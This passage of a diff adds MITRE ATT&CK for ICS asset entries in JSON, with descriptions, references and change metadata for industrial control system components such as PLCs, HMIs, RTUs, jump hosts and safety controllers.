+                            "name": "Industrial Edge",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Devices that may house a cellular or other type of communication stack that is outside the normal network path. May be bi-directional access by outside parties or unidirectional by design to allow for feeding of data to outside areas such as corporate, vendor, or cloud."
+                        }
+                    ],
+                    "x_mitre_version": "2.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 15:01:48.509000+00:00\", \"old_value\": \"2023-09-28T15:01:48.509Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T17:47:40.077Z\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:48:36.305000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0006",
+                            "external_id": "A0006"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Data Historian",
+                    "description": "Data historians, or historian, are systems used to collect and store data, including telemetry, events, alerts, and alarms about the operational process and supporting devices. The historian typically utilizes a database to store this data, and commonly provide tools and interfaces to support the analysis of the data. Data historians are often used to support various engineering or business analysis functions and therefore commonly needs access from the corporate network. Data historians often work in a hierarchical paradigm where lower/site level historians collect and store data which is then aggregated into a site/plant level historian. Therefore, data historians often have remote services that can be accessed externally from the ICS network. Many data historian vendors have designed their software to securely transfer data between the ICS and business networks instead of requiring business systems to access the data historian in the ICS network directly.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:48:36.305000+00:00\", \"old_value\": \"2023-09-28T14:48:36.305Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T01:03:57.506Z\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--85f285f9-0a48-4998-921d-8a47d81c0e6d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-24 22:53:09.627000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0017",
+                            "external_id": "A0017"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Distributed Control System (DCS) Controller",
+                    "description": "A Distributed Control System (DCS) Controller is a microprocessor unit that is used to manage automation processes. DCS Controllers are often found in plants (chemical, manufacturing, oil and gas, etc.) where large scale continuous automation processes are required. A DCS Controller typically operates as part of a larger networked system with other DCS Controllers where each DCS Controller manages an individual part of a continuous process. In addition to these other controllers, DCS Controllers operate along side multiple other system components including system software, operator stations, and other embedded field controllers. The distributed nature of DCS Controllers provides scalability, redundancy, and improved process reliability. DCS Controllers are programmed using traditional process automation programming languages (IEC-61131). ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Field Device / Controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Distributed Control System (DCS) Controller may be referred to as Field Controllers or Field Devices as a general function name."
+                        },
+                        {
+                            "name": "Programmable Logic Controller (PLC)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Programmable Logic Controllers (PLC) share some of the same functionality as DCS Controllers, although often without more advanced control features. "
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-24 22:53:09.627000+00:00\", \"old_value\": \"2025-09-24T22:53:09.627Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T01:01:01.668Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 17:57:22.946000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0013",
+                            "external_id": "A0013"
+                        },
+                        {
+                            "source_name": "Guidance - NIST SP800-82",
+                            "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.",
+                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Field I/O",
+                    "description": "Field I/O are devices that communicate with a controller or data aggregator to either send input data or receive output data. Input data may include readings about a given environment/device state from sensors, while output data may include data sent back to actuators for them to either undertake actions or change parameter values.(Citation: Guidance - NIST SP800-82) These devices are frequently embedded devices running on lightweight embedded operating systems or RTOSes. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Smart Sensors",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "*A device that procures a voltage or current output that is representative of some physical property being measured (e.g., speed, temperature, flow).* (Citation: Guidance - NIST SP800-82) Smart sensors take this functionality and add on on-device processing and network communication."
+                        },
+                        {
+                            "name": "Variable Frequency Drive (VFD)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "*A type of drive that controls the speed, but not the precise position, of a non-servo, AC motor by varying the frequency of the electricity going to that motor. VFDs are typically used for applications where speed and power are important, but precise positioning is not.* (Citation: Guidance - NIST SP800-82) VFDs can be network connected."
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 17:57:22.946000+00:00\", \"old_value\": \"2023-09-28T17:57:22.946Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T16:50:21.228Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--bb141168-ae41-4974-8ece-dc9b63e59237",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-24 18:17:26.575000+00:00",
+                    "modified": "2026-05-12 14:53:28.476000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0016",
+                            "external_id": "A0016"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Firewall",
+                    "description": "A gateway that limits access between networks in accordance with local security policy.\n\nIn ICS networks, firewalls can exist in multiple locations in the network architecture and  serve a variety of purposes. The first, and often the most important, is the firewall segmenting the ICS network from the business network. This firewall acts as the primary network boundary point that controls the ingress/egress of network traffic between the ICS and business networks. This firewall may also be a single device connected to multiple network segments, where the firewall defines individual zones for the different network segments and can control access to the zones and between the zones. This can limit the ability of an adversary to traverse a network.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Windows",
+                        "Linux",
+                        "Network"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Boundary Firewall",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A boundary firewall is used to control the flow of traffic between two different networks. It is typically used to delineate the different levels of the Purdue Model. "
+                        },
+                        {
+                            "name": "Device Firewall",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A device firewall is used to control the flow of traffic between a network and an individual device. It is used when additional protections are required beyond that of a boundary firewall. For example, a boundary firewall may limit traffic on the network to two protocols, but, a device firewall may further limit traffic to a particular device on that network to a single protocol."
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_related_assets'][1]['related_asset_sectors']\": [\"General\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-24 18:17:26.575000+00:00\", \"old_value\": \"2025-09-24T18:17:26.575Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 14:53:28.476000+00:00\", \"old_value\": \"2026-04-27T18:02:22.344Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:38:54.407000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0002",
+                            "external_id": "A0002"
+                        },
+                        {
+                            "source_name": "IEC February 2019",
+                            "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ",
+                            "url": "https://webstore.iec.ch/publication/34421"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Human-Machine Interface (HMI)",
+                    "description": "Human-Machine Interfaces (HMIs) are systems used by an operator to monitor the real-time status of an operational process and to perform necessary control functions, including the adjustment of device parameters. An HMI can take various forms, including a dedicated screen or control panel integrated with a specific device/controller, or a customizable software GUI application running on a standard operating system (e.g., MS Windows) that interfaces with a control/SCADA server. The HMI is critical to ensuring operators have sufficient visibility and control over the operational process.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Operator Workstation (OWS)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "An Operator Workstation (OWS) or Console is a system or device used by an operator to interface with a control system, including to access/visualizes key information or parameters about the operational process and initiate control actions. This typically consists of specialized OWS software installed on a Workstation platform. (Citation: IEC February 2019)"
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:38:54.407000+00:00\", \"old_value\": \"2023-09-28T14:38:54.407Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T00:58:37.171Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:46:42.566000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0005",
+                            "external_id": "A0005"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Intelligent Electronic Device (IED)",
+                    "description": "An Intelligent Electronic Device (IED) is a type of specialized field device that is designed to perform specific operational functions, frequently for protection, monitoring, or control within the electric sector. IEDs are typically used to both acquire telemetry and execute tailored control algorithms/actions based on customizable parameters/settings. An IED is usually implemented as a dedicated embedded device and supports various network automation protocols to communicate with RTUs and Control Servers.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Protection Relay",
+                            "related_asset_sectors": [
+                                "Electric"
+                            ],
+                            "description": "A protection relay is a type of IED used within the electric sector to monitor for faults or problematic operating conditions on power lines, busses, or transformers. While traditionally protection relays were electromechanical or electromagnetic devices, modern relays utilize microprocessors, embedded operating system, and SCADA communications."
+                        },
+                        {
+                            "name": "Field Device / Controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "IEDs may be referred to as Field Controllers or Field Devices as a general function name. "
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "Electric"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:46:42.566000+00:00\", \"old_value\": \"2023-09-28T14:46:42.566Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T16:47:33.077Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 17:52:53.206000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0012",
+                            "external_id": "A0012"
+                        },
+                        {
+                            "source_name": "North American Electric Reliability Corporation June 2021",
+                            "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ",
+                            "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Jump Host",
+                    "description": "Jump hosts are devices used to support remote management sessions into ICS networks or devices. The system is used to access the ICS environment securely from external networks, such as the corporate network. The user must first remote into the jump host before they can access ICS devices. The jump host may be a customized Windows server using common remote access protocols (e.g., RDP) or a dedicated access management device. The jump host typically performs various security functions to ensure the authenticity of remote sessions, including authentication, enforcing access controls/permissions, and auditing all access attempts.  ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Intermediate System",
+                            "related_asset_sectors": [
+                                "Electric"
+                            ],
+                            "description": "A Cyber Asset or collection of Cyber Assets performing access control to restrict Interactive Remote Access to only authorized users.(Citation: North American Electric Reliability Corporation June 2021)"
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 17:52:53.206000+00:00\", \"old_value\": \"2023-09-28T17:52:53.206Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T00:58:05.830Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--459e4335-74e1-4136-b730-0f116f0d541d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-29 18:56:19.712000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0018",
+                            "external_id": "A0018"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Programmable Automation Controller (PAC)",
+                    "description": "A Programmable Automation Controller (PAC) is an embedded programmable control device. PACs are designed to enable automation applications across integrated software applications, peer controllers (e.g., PLC), Human Machine Interfaces, and other systems. PACs often include advanced features for process control, motion control, drive control, and vision applications. PACs are programmed using traditional process automation programming languages (IEC-61131) and sometimes languages such as C and C++ to support more advanced controls.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Field Device / Controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Programmable Automation Controller (PAC) may be referred to as Field Controllers or Field Devices as a general function name."
+                        },
+                        {
+                            "name": "Programmable Logic Controller (PLC)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Programmable Logic Controllers (PLC) share some of the same functionality as PACs, although often without more advanced control features. Historically, differences between PLCs and PACs were minimal, resulting in varying use of the terms across industry. "
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-29 18:56:19.712000+00:00\", \"old_value\": \"2025-09-29T18:56:19.712Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T16:50:01.628Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:43:05.105000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0003",
+                            "external_id": "A0003"
+                        },
+                        {
+                            "source_name": "IEC February 2013",
+                            "description": "IEC 2013, February 20 IEC 61131-3:2013  Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ",
+                            "url": "https://webstore.iec.ch/publication/4552"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Programmable Logic Controller (PLC)",
+                    "description": "A Programmable Logic Controller (PLC) is an embedded programmable control device. PLCs typically utilize a modular architecture with separate modules used to support its processing capabilities, communication mediums, and I/O interfaces. PLCs allow for the deployment of customized programs/logic to control or monitor an operational process. This logic is defined using industry specific programming languages, such as IEC 61131 (Citation: IEC February 2013), which define the set of tasks and program organizational units (POUs) included in the device\u2019s programs.  PLCs also typically have distinct operating modes (e.g., Remote, Run, Program, Stop) which are used to determine when the device can be programmed or whether it should execute the custom logic.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Process Automation Controller  (PAC)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Process Automation Controllers (PAC) share much of the same functionality as a PLC. PACs may include advanced features for process control, motion control, drive control, and vision applications. PACs may include additional features such as options to program in traditional programming languages such as C and C++ in addition to 61131 programming languages in order to support these more advanced controls.  "
+                        },
+                        {
+                            "name": "Field Device / Controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Programmable Logic Controller (PLC) may be referred to as Field Controllers or Field Devices as a general function name.   "
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:43:05.105000+00:00\", \"old_value\": \"2023-09-28T14:43:05.105Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T16:47:46.663Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:44:54.756000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0004",
+                            "external_id": "A0004"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Remote Terminal Unit (RTU)",
+                    "description": "A Remote Terminal Unit (RTU) is a device that typically resides between field devices (e.g., PLCs, IEDs) and control/SCADA servers and supports various communication interfacing and data aggregation functions. RTUs are typically responsible for forwarding commands from the control server and the collection of telemetry, events, and alerts from the field devices. An RTU can be implemented as a dedicated embedded device, as software platform that runs on a hardened/ruggedized computer, or using a custom application program on a PLC.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "Electric",
+                        "General",
+                        "Water and Wastewater"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:44:54.756000+00:00\", \"old_value\": \"2023-09-28T14:44:54.756Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T00:58:18.239Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-29 18:55:09.319000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0014",
+                            "external_id": "A0014"
+                        },
+                        {
+                            "source_name": "IETF RFC4949 2007",
+                            "description": "Internet Engineering Task Force. (2007, August). Internet Security Glossary, Version 2. Retrieved September 29, 2023.",
+                            "url": "https://www.ietf.org/rfc/rfc4949.txt"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Routers",
+                    "description": "A computer that is a gateway between two networks at OSI layer 3 and that relays and directs data packets through that inter-network. The most common form of router operates on IP packets.(Citation: IETF RFC4949 2007)",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Network"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-29 18:55:09.319000+00:00\", \"old_value\": \"2023-09-29T18:55:09.319Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T17:45:55.901Z\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 15:10:05.534000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0010",
+                            "external_id": "A0010"
+                        },
+                        {
+                            "source_name": "Guidance - NIST SP800-82",
+                            "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.",
+                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
+                        },
+                        {
+                            "source_name": "SIGTTO ESD 2021",
+                            "description": "Society of International Gas Tanker & Terminal Operators Ltd. (2021). ESD Systems: Recommendations for Emergency Shutdown and Related Safety Systems (Second Edition). Retrieved September 28, 2023.",
+                            "url": "https://sigtto.org/media/3457/sigtto-2021-esd-systems.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Safety Controller",
+                    "description": "Safety controllers are typically a type of field device used to perform the safety critical function. Safety controllers often support the deployment of custom programs/logic, similar to a PLC, but can also be tailored for sector specific functions/applications. The safety controllers typically utilize redundant hardware and processors to ensure they operate reliably if a component fails.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Safety Instrumented System (SIS) controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "SIS controllers are used to \u201ctake the process to a safe state when predetermined conditions are violated\u201d (Citation: Guidance - NIST SP800-82) through the reading of sensor data and interaction with digital/physical control surfaces. These devices are oftentimes located on programmable embedded devices running specialized RTOS or other embedded operating systems. "
+                        },
+                        {
+                            "name": "Emergency Shutdown Systems (ESD) controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
